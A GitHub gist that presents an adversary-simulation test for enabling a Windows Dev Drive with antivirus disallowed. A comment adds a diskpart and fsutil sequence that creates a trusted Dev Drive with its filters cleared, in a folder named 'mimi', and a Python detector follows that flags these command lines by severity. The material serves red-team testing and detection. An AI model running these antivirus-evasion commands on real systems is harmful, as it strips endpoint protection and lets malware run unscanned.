
@MHaggis
Created November 8, 2023 17:32
```yaml
- name: Enable Dev Drive With Disabled AV Using Fsutil
  description: |
    This test simulates an adversary enabling a Developer Drive using fsutil.exe with arguments that disable antivirus (AV) on the created drive.
    This technique requires administrative privileges and is relevant for Windows 11 environments starting with Build #10.0.22621.2338 or later.
    The execution of this command should be closely monitored and flagged in production environments.
    Ref. https://x.com/0gtweet/status/1720419490519752955?s=20 and https://x.com/Kostastsale/status/1721271281705001306?s=20
  supported_platforms:
    - windows
  executor:
    name: powershell
    elevation_required: true
    command: |
      fsutil.exe devdrv enable
      fsutil.exe devdrv enable /disallowav
```
MHaggis commented Nov 8, 2023

Bonus points:

```cmd
md c:\temp\mimi
cd /d c:\temp\mimi
echo create vdisk file="c:\temp\mimi\mimi.vhdx" maximum=10240 type=expandable >> diskpart.txt
echo select vdisk file="c:\temp\mimi\mimi.vhdx" >> diskpart.txt
echo attach vdisk >> diskpart.txt
echo assign letter=b >> diskpart.txt
echo exit >> diskpart.txt

diskpart /s c:\temp\mimi\diskpart.txt

format b: /devdrv /q /y

fsutil devdrv clearFiltersAllowed b:
fsutil devdrv trust b:
fsutil devdrv query b:
```
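
Both the atomic test and the diskpart/fsutil sequence in the comment produce command lines that the description says should be flagged. The block below is an added detection example, not part of the gist: it classifies process-creation command lines (the sample events, hosts and users are constructed for this example) by the Dev Drive action they perform, so `/disallowav` and `clearFiltersAllowed` surface as high severity while a routine `fsutil devdrv query` stays informational.

```python
import re
import shlex
from typing import Optional

# Constructed sample process-creation events (fields loosely modelled on
# Windows 4688 / Sysmon Event ID 1); hosts, users and paths are made up.
SAMPLE_EVENTS = [
    {"host": "ws01", "user": "CORP\\admin", "cmd": "fsutil.exe devdrv enable /disallowav"},
    {"host": "ws01", "user": "CORP\\admin", "cmd": "format b: /devdrv /q /y"},
    {"host": "ws01", "user": "CORP\\admin", "cmd": "fsutil devdrv clearFiltersAllowed b:"},
    {"host": "ws02", "user": "CORP\\dev", "cmd": "fsutil devdrv query c:"},
    {"host": "ws02", "user": "CORP\\dev", "cmd": "fsutil.exe dirty query c:"},
    {"host": "ws03", "user": "CORP\\svc", "cmd": 'diskpart /s "c:\\temp\\mimi\\diskpart.txt"'},
]

SEVERITY = {"low": 0, "medium": 1, "high": 2}


def classify(cmd: str) -> Optional[str]:
    """Label a command line that changes Dev Drive state (case-insensitive, ignores image path, .exe/.com suffix and argument order), else None."""
    try:
        argv = shlex.split(cmd, posix=False)  # keep Windows quoting and backslashes
    except ValueError:                         # unbalanced quote in the log line
        argv = cmd.split()
    if not argv:
        return None
    exe = re.sub(r"\.(exe|com)$", "", argv[0].lower().rsplit("\\", 1)[-1])
    args = [a.lower() for a in argv[1:]]
    if exe == "fsutil" and args[:1] == ["devdrv"]:
        if "/disallowav" in args:
            return "high: Dev Drive enabled with antivirus disallowed"
        if "clearfiltersallowed" in args:
            return "high: allowed filter list cleared on a Dev Drive volume"
        if "trust" in args:
            return "medium: volume marked as trusted Dev Drive"
        if "enable" in args:
            return "medium: Dev Drive feature enabled"
        return "low: other Dev Drive subcommand (query, untrust, ...)"
    if exe == "format" and "/devdrv" in args:
        return "medium: volume formatted as Dev Drive"
    return None


def scan(events: list, min_severity: str = "low") -> list:
    """Run classify() over events, keeping findings at or above min_severity."""
    findings = []
    for ev in events:
        label = classify(ev.get("cmd", ""))
        if label and SEVERITY[label.split(":", 1)[0]] >= SEVERITY[min_severity]:
            findings.append({**ev, "finding": label})
    return findings
```

Feed it the CommandLine field of your own 4688 or Sysmon events; `diskpart` itself is deliberately not matched, since the volume creation is ordinary activity and only the Dev Drive trust changes are the signal.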
